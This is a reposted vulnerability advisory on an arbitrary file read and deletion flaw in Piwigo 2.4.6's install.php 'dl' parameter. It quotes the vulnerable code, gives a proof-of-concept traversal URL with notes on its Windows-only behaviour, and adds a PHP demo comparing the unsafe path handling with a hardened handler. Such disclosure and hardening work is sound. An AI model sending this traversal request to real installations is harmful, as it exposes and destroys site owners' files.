China Network Penetration Testing Alliance
Title:
Piwigo arbitrary file disclosure and arbitrary file deletion vulnerability
Author:
admin
Time:
2013-3-14 20:15
Piwigo is a photo gallery (album) application written in PHP.
Piwigo 2.4.6 (and, according to the advisory, other versions) does not validate the 'dl' parameter of the install.php script. The value is appended to the data directory path after a fixed 'pwg_' prefix and, if file_exists() succeeds, the file is sent to the client and then unlinked. Supplying '../' sequences therefore lets an attacker read any file the web server process can read and, because unlink() runs on the same path, delete any file the web server user can write (the advisory describes this as deletion within the affected application's context). Two details matter when reproducing it: the download always arrives under the name database.inc.php whatever file was actually read, and the traversal depends on the bogus 'pwg_..' path component being discarded. Windows normalises paths lexically before consulting the filesystem, so the check passes there; on Linux every intermediate component must exist, so the same URL yields nothing. The advisory's tests were run on Windows.
====================================================================
/install.php (lines 113-124 of the affected release):
-------------
if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
{
  // $_GET['dl'] is used as-is: only a 'pwg_' prefix is added, no traversal check
  $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
  header('Cache-Control: no-cache, must-revalidate');
  header('Pragma: no-cache');
  // the download name is fixed regardless of which file was actually read
  header('Content-Disposition: attachment; filename="database.inc.php"');
  header('Content-Transfer-Encoding: binary');
  header('Content-Length: '.filesize($filename));
  echo file_get_contents($filename);   // arbitrary file read
  unlink($filename);                   // arbitrary file deletion
  exit();
}
====================================================================
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843

15.02.2013
--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt

Because the prefix turns the first '../' into a bogus 'pwg_..' component, the next '../' is spent cancelling it and the remaining ones climb out of the web root. The request returns the target file and deletes it in the same go, so a test against a real file is destructive.
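As an added example that is not part of the advisory or of Piwigo's code base, the following PHP puts the unsafe path construction from the excerpt above beside a hardened version of the download handler. The function names (vuln_path, safe_install_download, send_and_unlink), the temporary directory layout and the sample files are assumptions made for this illustration; the script runs from the command line and removes what it creates.

```php
<?php
// Added example; this is not Piwigo's code. vuln_path() reproduces the path
// construction from the install.php excerpt, safe_install_download() is a
// hardened replacement. Function names, the temporary directory layout and the
// sample files are assumptions made for this illustration.

// Vulnerable construction: the user value follows a fixed 'pwg_' prefix and
// nothing else. $data_dir stands for PHPWG_ROOT_PATH.$conf['data_location'],
// assumed (as in the original) to end with a directory separator.
function vuln_path(string $data_dir, string $dl): string
{
    return $data_dir . 'pwg_' . $dl;
}

// Hardened replacement with two independent layers.
function safe_install_download(string $data_dir, string $dl): ?string
{
    // Layer 1: a bare file name only. No separators, no '..', nothing empty.
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]*\z/', $dl) || strpos($dl, '..') !== false) {
        return null;
    }
    // Layer 2: resolve both sides and require $path to sit under $base.
    // realpath() follows symlinks, so a link planted inside the data
    // directory that points elsewhere is rejected here.
    $base = realpath($data_dir);
    $path = realpath($data_dir . 'pwg_' . $dl);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Send and delete only a path that passed validation; the original did both on the raw value.
function send_and_unlink(string $path): void
{
    header('Cache-Control: no-cache, must-revalidate');
    header('Pragma: no-cache');
    header('Content-Disposition: attachment; filename="database.inc.php"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
    unlink($path);
}

// ---- demonstration on a constructed layout under the system temp directory ----
$root     = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'piwigo_demo_' . getmypid() . DIRECTORY_SEPARATOR;
$data_dir = $root . '_data' . DIRECTORY_SEPARATOR;
mkdir($data_dir, 0700, true);
file_put_contents($data_dir . 'pwg_database.inc.php', "<?php // generated config\n");
file_put_contents($root . 'secret.txt', "not for download\n");

// Two '../' are needed: the first cancels the bogus 'pwg_..' component, the
// second leaves _data. Windows discards 'pwg_..' lexically before consulting
// the filesystem, so file_exists() is true there; Linux requires every
// component to exist, so the same probe is false.
$traversal = '../../secret.txt';
echo "raw check on traversal: ";    var_dump(file_exists(vuln_path($data_dir, $traversal)));
echo "hardened, legitimate name: "; var_dump(safe_install_download($data_dir, 'database.inc.php'));
echo "hardened, traversal: ";       var_dump(safe_install_download($data_dir, $traversal)); // NULL

// Symlink planted in the data directory: passes layer 1, fails layer 2.
if (@symlink($root . 'secret.txt', $data_dir . 'pwg_link.txt')) {
    echo "hardened, symlink: ";     var_dump(safe_install_download($data_dir, 'link.txt')); // NULL
    unlink($data_dir . 'pwg_link.txt');
}

// cleanup
unlink($root . 'secret.txt');
unlink($data_dir . 'pwg_database.inc.php');
rmdir($data_dir);
rmdir($root);
```

Run it with the PHP CLI on both a Windows and a Linux host: the raw file_exists() probe differs between them, which is why the advisory's PoC was tested on Windows, while the hardened function rejects the traversal and the planted symlink on both. Whitelisting the file name alone would already stop the traversal; the realpath() containment check is kept so that a symlink or a later change to the data directory layout cannot reopen the hole.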